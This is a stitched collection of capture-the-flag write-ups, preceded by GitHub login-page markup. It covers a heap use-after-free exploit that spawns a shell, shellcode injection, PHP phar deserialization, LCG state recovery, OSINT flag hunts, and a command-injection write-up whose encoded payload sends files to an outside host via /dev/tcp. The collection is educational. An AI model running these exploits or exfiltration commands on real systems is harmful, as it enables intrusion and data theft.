data-pjax-transient="true" /> <meta name="selected-link" value="/login" data-pjax-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" /> <meta name="analytics-location-query-strip" content="true" data-pjax-transient="true" /> <meta name="hostname" content="github.com"> <meta name="user-login" content=""> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION"> <meta http-equiv="x-pjax-version" content="87b9d0e3d6a8a9144b712e90dd0772c1d3aa2ea8c414816edde144ebbfc07fc3"> <meta http-equiv="x-pjax-csp-version" content="2961869ef171e90c8991818e57dbe138c0fb830bb3b52e0ab0e81ccb4709c345"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5"> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" /> <link rel="canonical" href="https://github.com/login" data-pjax-transient> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive session-authentication" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <div id="unsupported-browser" class="unsupported-browser" hidden> <div class="container-lg p-responsive clearfix d-flex flex-items-center py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert color-fg-subtle mr-2 hide-sm"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <div class="d-flex flex-auto flex-column flex-md-row"> <div class="flex-auto min-width-0 mr-2" style="padding-top:1px"> <span>GitHub no longer supports this web browser.</span> Learn more about the browsers we support. </div> </div> </div></div> <div class="header header-logged-out width-full pt-5 pb-4" role="banner"> <div class="container clearfix width-full text-center"> <svg height="48" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="48" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> </div></div> </div> <div id="start-of-content" class="show-on-focus"></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <main id="js-pjax-container" data-pjax-container> <div class="auth-form px-3" id="login" > <input type="hidden" name="ga_id" class="js-octo-ga-id-input"> <div class="auth-form-header p-0"> <h1>Sign in to GitHub</h1> </div> <div data-pjax-replace id="js-flash-container"> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="container-lg px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div> </div></div> </template></div> <div class="flash js-transform-notice" hidden> <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-label="Dismiss" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> </div> <div class="auth-form-body mt-3"> </option></form><form action="/session" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="8Ll/v0MvNqRZBNlq1gHLQwLRTUFXNYSBRGbFilfE5UplhXLl28V+LMyb+IIt0T34Tb/uchCI2fsPz7JFsCPMiQ==" /> <label for="login_field"> Username or email address </label> <input type="text" name="login" id="login_field" class="form-control input-block js-login-field" autocapitalize="off" autocorrect="off" autocomplete="username" autofocus="autofocus" /> <div class="position-relative"> <label for="password"> Password </label> <input type="password" name="password" id="password" class="form-control form-control input-block js-password-field" autocomplete="current-password" /> <input type="hidden" name="trusted_device" id="trusted_device" autocomplete="off" class="form-control" /> <input type="hidden" class="js-webauthn-support" name="webauthn-support" value="unknown"><input type="hidden" class="js-webauthn-iuvpaa-support" name="webauthn-iuvpaa-support" value="unknown"><input type="hidden" name="return_to" id="return_to" value="https://github.com/xnomas/Nahamcon-2021-Writeups/edit/main/The-Mission/Hercules/README.md" autocomplete="off" class="form-control" /><input type="hidden" name="allow_signup" id="allow_signup" autocomplete="off" class="form-control" /><input type="hidden" name="client_id" id="client_id" autocomplete="off" class="form-control" /><input type="hidden" name="integration" id="integration" autocomplete="off" class="form-control" /><input type="text" name="required_field_7f27" hidden="hidden" class="form-control" /><input type="hidden" name="timestamp" value="1635977092597" autocomplete="off" class="form-control" /><input type="hidden" name="timestamp_secret" value="df0070522b766d51c9072ed5756c5592f9a4e54531620b628de278fde1afa0c1" autocomplete="off" class="form-control" /> <input type="submit" name="commit" value="Sign in" class="btn btn-primary btn-block js-sign-in-button" data-disable-with="Signing in…" data-signin-label="Sign in" data-sso-label="Sign in with your identity provider" /> Forgot password? </div></form> </div> New to GitHub? Create an account. New to GitHub? Create an account. </div> </main> </div> <div class="footer container-lg p-responsive py-6 mt-6 f6" role="contentinfo"> Terms Privacy Security Contact GitHub </div> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template> </body></html>
# Da Vinci CTF 2021 - Quotebook (499 pts)The subject of this task was: >> I created this amazing service to store all my famous quotes. Can you get the flag?> > nc challs.dvc.tf 2222 We are given the binary, the source code for it and the libc used on the server. We'll need to find a vuln into the binary to get a shell and grab a flag from the server (typical pwn task). ## Source analysis When looking at the source code, we can see that a quote is defined like this:```ctypedef struct quote_t quote_t;struct quote_t{ char * content; unsigned int content_size; char * title; unsigned int title_size; void (*write)(quote_t *); void (*read)(quote_t *);};``` and we have an array to store the quotes with a variable which indexes the "current" quote:```cquote_t * book[NB_PAGE];unsigned int book_ctr;``` So, when a quote is created, a buffer of `sizeof(quote_t)` is allocated, then the program asks the title and content size, to allocate buffers from the given size. Then the title and contents are read from `stdin`. The interesting things happen when freeing a quote:```c int choice = get_choice("Quote number"); if(choice < 1 || choice >= book_ctr + 1) { puts("[!] Error : wrong quote number !"); } else { free(book[choice - 1]); book_ctr--; }``` First of all, the buffers containing the title and quote are not freed (enjoy ur memory leak), and even freed, the pointer is still present on the `book` array, and the book_ctr is decremented (which is useless since you can control which entry you want to free).So from there we can trigger an use-after-free vulnerability. ## Leaking libc addressIf we create a quote and destroy it afterwards, the `book` array still contains the address of the freed buffer. This means that if we can control program allocations, then we can write anything we want on that buffer, while the program still believes it's a `quote_t` structure. And remember, we can allocate buffers from the size we want while creating a quote, and write what we want on it. And since we can list quotes:```cvoid quote_read(quote_t * quote){ printf("[+] %s", quote->title); printf("[>] %s", quote->content);}```, if `content` or `title` point to the binary's GOT section, then we can leak a libc's function address, and then getting the libc base. But we have to be careful, because `book_ctr` is decremented, if we only create one quote and remove it, its pointer will be overwritten by the new quote we create. So let's create 3 quotes, with buffers of size 1. The heap will look like something like this:```-----------------------------------------------| first struct | second struct | third struct |----------------------------------------------- book[0] book[1] book[2]```The small buffers we allocated are placed in another heap arena (since they are 1 bytes long) Now, we'll delete the first two structs, the heap will now look like this:```------------------------------------------------| freed chunk | freed chunk | third struct |------------------------------------------------ book[0] book[1] book[2]``` And this time we'll create a new quote (on `book[book_ctr]`), but with a sizeof(quote) length, so the heap will look like this:```------------------------------------------------| book1 buffer | freed chunk | third struct |------------------------------------------------ book[0] book[1] book[2]```We can clearly see that the freed chunk pointed by book[0] contains the second's quote buffer, and we can craft a fake `quote_t` struct with program's GOT as title pointer.```python# Craft UAF with title overwriting first quote_t structures.sendline("2")print(s.recvuntil('size > '))# title sizes.sendline("1")print(s.recvuntil(' size > '))# content sizes.sendline("48")s.recvuntil('Title > ') PRINTF_ADDR = 0x404030RANDOM_BUF = 0x4040c0#### Craft structure to leak libc #### Pack content and content sizebuf = pwn.pack(RANDOM_BUF, 64) + pwn.pack(1, 64)# Pack title addr and size (printf addr in PLT)buf += pwn.pack(PRINTF_ADDR, 64) + pwn.pack(8, 64)# Set function pointersbuf += pwn.pack(0x401236, 64) + pwn.pack(0x401294, 64) # Send titles.sendline("a")print(str(s.recv(), 'ascii')) # Send contents.sendline(buf)print(str(s.recv(), 'ascii')) # Display quote and trigger UAFs.recv()s.sendline("3")print(s.recv())s.sendline("1")s.recvline()leak = s.recvline() # quote contents contain printf addr```This way we can get the glibc's printf address, and compute system() address by doing:```pythonleak = s.recvline()puts_leak = leak[4:4+6]addr = pwn.unpack(puts_leak, len(puts_leak)*8)libc_base = addr - libc.symbols["printf"]system_addr = libc_base + libc.symbols["system"]``` Now, let's get a shell !## Pwning the app and getting a shellFortunately , the program allows us to edit a quote, this basically means replacing the old buffer's content by something else. Also, the program contains function pointers that we can overwrite to redirect to any address we want since we can craft a whole quote_t structure. The function pointers have this prototype:```c void (*write)(quote_t *); void (*read)(quote_t *);```So it would be nice to redirect the control flow to a function which takes one argument, and luckily we have: `system(char *command)` to do this. So to get a shell we need to: - put the `/bin/sh` string at the beginning of the buffer - put system address we got from the leak before at the `write` function pointer (since `read` gets overwritten because the programs insert a newline) - Edit the first quote (the crafted one) to call our function pointer - ??? - PROFIT ```python# Edit the second quote so we can control first's quote buffers.sendline("4")s.recv()s.sendline("2")# Craft our content bufferb = b"/bin/sh\x00" + pwn.pack(1, 64)# Padding to reach function pointersb += b"A"* 16b += pwn.pack(system_addr, 64) * 2s.sendline(b)s.recvuntil('Choice number > ') # Edit the first quote to trigger system()s.sendline("4")s.recvuntil('Quote number > ')s.sendline("1")# Get the shells.interactive()```
# Patch of the Ninja Executing a strings tool to the binary file reveals the hidden flag. The whole process can be seen on the Figure 1. ![](https://raw.githubusercontent.com/kukuxumushi/HTBxUNI-CTF-quals-writeups/master/pictures/2021-03-07-23-19-44.png) Figure 1 – The whole task solution Flag: HTB{C00l_Shurik3n}.
# The Mission ## Briefing ```Enter the flag you find on The Mission page to open the gates and unlock challenges for The Mission. Please note, your participation in "The Mission" serves as permission for us to share your e-mail address with our sponsors, for potential career opportunities and private invitations to vulnerability disclosure and bug bounty programs. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges.``` ## Getting the flag Navigate to the [Mission page](https://ctf.nahamcon.com/mission) (might be a dead link now). And, `Ctrl+U` && `Ctrl + F` and search for `flag```` ```OR! Use (webctf)[https://github.com/xnomas/web-ctf-help] like so:```webctf https://ctf.nahamcon.com/mission =============COMMENTS============= [+] 1 : Google Font: Source Sans Pro[+] 2 : Content Wrapper. Contains page content[+] 3 : Thank you for reading the rules! Your flag is:[+] 4 : flag{48e117a1464c3202714dc9a350533a59}[+] 5 : /.content-wrapper[+] 6 : Main Footer[+] 7 : To the right[+] 8 : Default to the left[+] 9 : ./wrapper[+] 10 : REQUIRED SCRIPTS =============SCRIPTS============= [+] 1 : /themes/ctf4hire/static/js/vendor.bundle.min.js?d=f99cb2bc[+] 2 : /themes/ctf4hire/static/js/core.min.js?d=f99cb2bc[+] 3 : /themes/ctf4hire/static/js/helpers.min.js?d=f99cb2bc[+] 4 : /themes/ctf4hire/static/js/pages/main.min.js?d=f99cb2bc =============IMAGES============= sources:--------[+] 1 : /files/1a8a5ff60fea50451ab09535ea36bb24/flag_white.png alts:-----[+] 1 : NahamCon CTF ===================INTERESTING HEADERS=================== Server : gunicorn/20.0.4Set-Cookie : session=dd9b86c5-bd1a-40fb-a81d-58de3b5171e8.a_NA4UpcnABLbZz92Gon1fLAzbk; HttpOnly; Path=/; SameSite=Lax```Flag found! Move on.
# Orion ## The brief ```This is Stage 1 of Path 3 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges. Use open-source intelligence to track down information on Orion. With the flag of this challenge, you should also find a password you can use in later challenges.``` ## Searching for Orion My initial thoughts were to look through the followers of Gus and Hercules. But nah, they ain't there. Maybe followers of constellations on twitter? Also not. But remember `Meet the Team`! We recovered the whole list of employees:![team](./team.png)Maybe search on twitter? ## Twitter I searched Twitter for `Orion Morra`:![orion](./twitter.png)And this hunk of a man showed up (ha). What's the first tweet?![creds](./creds.png)Nice, this is for the next phase. But is their some more information for us? ![hint](./hint.png) Great, this might be of use in other phases! And the flag? ![flag](./flag.png) Awesome! `flag{0bcffb17cbcbf4359a42ec45d0ccaf2}`
# Gus ## The brief ```This is Stage 1 of Path 4 in The Mission. After solving this challenge, you may need to refresh the page to see the newly unlocked challenges. Use open-source intelligence to track down information on Gus. With the flag of this challenge, you should also find details you can use in later challenges.``` ## Finding gus The first place you should have already looked at is the constellations github!![gus](./gus.png)Brilliant, time to check out his repos.![repos](./repos.png)Right, so `development` seems to be his own project and might be worth a look! Whenever doing a GitHub related OSINT challenge I check the commits:![commits](./commits.png)We have lots, but `Update flag.txt` is the important one now. ## Flag ```# NOTE:# This flag submits for the `Gus` challenge you should see after solving `Meet The Team`, after you solve `Bionic` flag{84d5cc7e162895fa0a5834f1efdd0b32}```The other files are important later :)
tldr (no pwn);- random seed is based on time- it's a bit expensive to precompute 1000000 values (without optimisations)- instead, reduce the bruteforce range by measuring the average time offset from connecting and the server generating the seed (see writeup for details)- this reduces the range of bruteforce to about ~800 which easily runs within the 1 minute timeout [writeup](https://jsur.in/posts/2021-03-07-zer0pts-ctf-2021-crypto-writeups#signme)
We were given the source code of an PHP application. **index.php**``` <html><head> <title>Phar Out!</title></head> <body> Upload a file, and I'll hash it with MD5 :-)<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST" enctype="multipart/form-data"><input type="file" name="the_file" /><input type="hidden" name="s" value="f" /><input type="submit" name="submit" value="Upload File" /></form> Upload a file, and I'll hash it with MD5 :-) 0){ $dest_dir = getcwd() . "/uploads/"; echo "Submitted"; $target_file = $dest_dir . basename($_FILES["the_file"]["name"]); //print_r($_FILES); move_uploaded_file($_FILES["the_file"]["tmp_name"], $target_file); if ($_POST['s'] === 'p') $s = 'phar://'; else $s = 'file://'; echo md5_file("$s$target_file"); unlink($target_file);} ?> </body> </html>``` **wrapper.php & doit.php**```doit)) { $this->doit = new Doit(); } else { echo "Hello from Wrapper!"; } }} ?> ``` As from the challenge's title **Phar out** we can immediately identify the vulnerability. It is all about [**unsecure phar deserialization**](https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2019/06/26/exploiting_php_phar-PRD7.html). Analyzing the source code, the objective is to POST a crafted phar archive and try to instantiate the Wrapper class with the parameter `$doit` set to some value.As `$doit` is a private class variable, we cannot simply use `$wrapper->doit='some value'`. We can though use PHP's [ReflectionClass](https://www.php.net/manual/en/class.reflectionclass.php) to set a value to `$doit`. The final exploit code: ```doit$reflectionClass = new ReflectionClass('Wrapper');$reflectionProperty = $reflectionClass->getProperty('doit');$reflectionProperty->setAccessible(true);$reflectionProperty->setValue($dummy, 'foobar'); // craft phar archive$poc = new Phar("poc.phar");$poc->startBuffering();$poc->setStub("setMetadata($dummy);$poc->stopBuffering(); ``` By submitting the generated `poc.phar` and setting the POST parameter `s=p` we can get the flag.```<html><head> <title>Phar Out!</title></head> <body> Upload a file, and I'll hash it with MD5 :-)<form action="/index.php" method="POST" enctype="multipart/form-data"><input type="file" name="the_file" /><input type="hidden" name="s" value="f" /><input type="submit" name="submit" value="Upload File" /></form> Upload a file, and I'll hash it with MD5 :-) Submittedflag{scooby} </body> </html>```
## PokePark - Raising New Generation Writeup (6 solves / 497 points)> nc 3.16.14.62 5000 ### [Solve Script](sol/apex.py)```pyfrom Crypto.Util.number import inverse, GCDfrom functools import reduce def get_inc(states, m, n): s1 = states[0] s2 = states[1] return ( s2 - m * s1) % n def get_mult(states, n): s1 = states[0] s2 = states[1] s3 = states[2] m = ((s3 - s2) * inverse(s2-s1, n)) % n return m def get_mod(states): diffs = [b - a for a, b in zip(states, states[1:])] z = [a*c - b**2 for a, b, c in zip(diffs, diffs[1:], diffs[2:])] n = reduce(GCD, z) return n def predict_state(curr_state, n, m, c): pred = (m * curr_state + c) % n return pred if __name__ == '__main__': states = [1997095401, 13001997, 1628715232, 1990339562, 284249215, 1372925577, 48385624, 1468364002, 2059193937, 26044107] n = get_mod(states) print("n:", n) m = get_mult(states, n) print("m:", m) c = get_inc(states, m, n) print("c:", c) print("predicted:", predict_state(states[-1], n, m, c)) ```The name of the challenge was supposed to be a hint that it's Park-Miller Random Number Generator ?. Here is a little bit of intro stuff about this Random Number Generator (RNG). State[i+1] = m * State[i] mod n State[i+1] = m * State[i] mod n where **m** is the multiplier and n is the prime modulus. So the next **State[i+1]** is determined by multiplying thecurrent **State[i]** with **m** and then mod **n**. ## Predicting The Next State### The ModulusAccording to this - [Cracking a linear congruential generator](https://security.stackexchange.com/questions/4268/cracking-a-linear-congruential-generator)we can recover the modulus by this method: *To recover m, define t<sub>n</sub> = s<sub>n</sub> + 1 - s<sub>n</sub> and u<sub>n</sub> = |t<sub>n</sub> + 2 * t<sub>n</sub> - t2<sub>n</sub> + 1|;then with high probability you will have m = gcd(u1, u2, ..., u10). 10 here is arbitrary; if you make it k, then the probability that this fails is exponentially small in k.* ### The MultiplierWe can get the multiplier by solving the two linear equations only,s1 = s0 * m + c (mod n) s2 = s1 * m + c (mod n) s2 - s1 = s1 * m - s0 * m (mod n) s2 - s1 = m * (s1 - s0) (mod n) m = ((s2 - s1) * inverse_mod(s1 - s0, n)) (mod n) s1 = s0 * m + c (mod n) s2 = s1 * m + c (mod n) s2 - s1 = s1 * m - s0 * m (mod n) s2 - s1 = m * (s1 - s0) (mod n) m = ((s2 - s1) * inverse_mod(s1 - s0, n)) (mod n) where **s0, s1 and s2** are the three consecutive states. ### The IncrementThe increment for Lehmer RNG is 0 but if you want you can recover that too,s1 = s0 * m + c (mod n) c = s1 - s0 * m (mod n) s1 = s0 * m + c (mod n) c = s1 - s0 * m (mod n) Now that we have the modulus, multiplier and the increment( which is 0 anyway) we can predict the next state like this: next_state = m * last_state + c (mod n) next_state = m * last_state + c (mod n) Now submit the predicted value and get the flag !!! \o/ ## Flag> darkCON{P0k3m0ns_4nd_RNG!!!} ### # Source Code + the binary - [[./src folder]](src/) ## Ref* [Lehmer random number generator - Wiki](https://en.wikipedia.org/wiki/Lehmer_random_number_generator)* [Cracking a linear congruential generator](https://security.stackexchange.com/questions/4268/cracking-a-linear-congruential-generator)
not very complex, solve it by gdb ``` pythontarget = 0x60023c offset = 256payload = 'A'*offsetpayload += p64(target+0x100) # debug()p.sendafter("Data: ", payload) sc=asm(shellcraft.sh())p.sendafter("Data: ", p64(target+0x8)+sc)```
# yellow_submarine ## Description yellow_submarine is a simple text-based TCP service on port 10002 written in Python 2. It provides a simple command shell and provides four commands: 1. `keygen`2. `store`3. `read`4. `exit` The connection stays open for 60 seconds and terminates after a timeout. The service first requires to generate an RSA key pair. This is done via the `keygen` command, which requires solving a Proof of Work (PoW). The generated key will be stored in a file named `signer_[UUID].key`, where `[UUID]` is a random UUID. This key will be used to sign output from the `store` function so that it cannot be forged. After the `keygen` command, the `store` command be used. It reads a string that will become the filename and a string in base64 which will be stored encrypted with AES in file with the previously chosen filename with the prefix `data_`. The AES encryption key will be stored along with this file with the same name and the additional suffix `.key`. Finally, a token is printed, which includes the key ID from the `keygen` command, the **shell command (!)** to retrieve the contents of the encrypted file via the UNIX command `cat`, the RSA signature for this string, another **shell command (!)** to retrieve the contents of the according key file via cat and finally another RSA signature for the previous string. The string from the `store` command can then be used with the `read` command to read the previously entered secret (in base64). This command reads in the parts of the token, takes the RSA key and verifies the signatures for the **shell commands (!)** The game server regularly stores flags via these commands. ### Proof of Work (PoW) The PoW consists of a challenge and a prefix. The first four characters of the SHA256 hash of the prefix together with an unknown value need to match the value of the challenge. See the function `pow()` in the exploit code for a possible solution. ### Demo ![Normal usage of yellow_submarine service in a shell via netcat](/2020.03%20UCSB%20iCTF/yellow_submarine/yellow_submarine.gif) ### Code For the source code of the service see [main.py](/2020.03%20UCSB%20iCTF/yellow_submarine/main.py). ## Exploit The bold written words in the description (**shell commands (!)**) were a slight hint for the possible exploitation of this service. The problem is that instead of reading the file contents via `file.read()`, a UNIX shell command (`cat`) is called via `os.popen()`. This is not really a problem, but it becomes an issue where the user input (the filename) is combined with this command without proper escaping/sanitization. This enables remote code execution (RCE) by providing a specifically crafted filename in the `store` command of the service. This command will then be executed when the token is used in with the `read` command. The following exploit provides a simple TCP server on a random port that acts as the target for the files which will be sent by the injected shell command. The string for a filename with an exploit basically looks like this: ```58629;echo Zm9yIGYgaW4gJChscyAtMSB8IGdyZXAgLUUgJ15kYXRhX1thLXowLTktXXszNn0oXC5rZXkpPyQnKTsgZG8gZWNobyAiJGYiID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4yLzUzMzExIDA+JjE7IGNhdCAiJGYiID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4yLzUzMzExIDA+JjE7IGRvbmU=|base64 -d|bash``` The first number is a random number to make sure that the file does not exist (probably not needed, but does not hurt). The rest of the command is converted to base64 and converted back to prevent problems with slashes as these will be interpreted as a path (actually base32 would probably be smarter for that). The base64 encoded string looks like this: ```for f in $(ls -1 | grep -E '^data_[a-z0-9-]{36}(\.key)?$'); do echo "$f" >& /dev/tcp/192.168.0.2/53311 0>&1; cat "$f" >& /dev/tcp/192.168.0.2/53311 0>&1; done``` It searches for files (secrets and their keys) that match a certain pattern (the game server apparently chooses this pattern for filenames) and redirects its contents to a TCP socket (bash feature) for the server created by the exploit. The filename is also included so they can be assembled properly (maybe using `tar` would be smarter). The rest of the exploit reads the received files and tries to decrypt them. If the output matches the flag pattern, it is returned on stdout. ### Code Requirements: - Python 3 (tested with 3.7.6)- [PyCryptodome](https://www.pycryptodome.org/) (`pip3 install pycryptodome`) See [exploit.py](/2020.03%20UCSB%20iCTF/yellow_submarine/exploit.py). Note: The target for the reverse shell (`REVERSE_SHELL_TARGET`) needs to be the hostname/IP of the host running the exploit. ## Fix Escape shell command in `read` command, e.g. via [`pipes.quote()`](https://docs.python.org/2/library/pipes.html). Note: The service is written in Python 2, therefore the `shlex` library is not available. ### Patch ```diff--- main.py.bak 2020-03-06 21:58:02.529359486 +0000+++ main.py 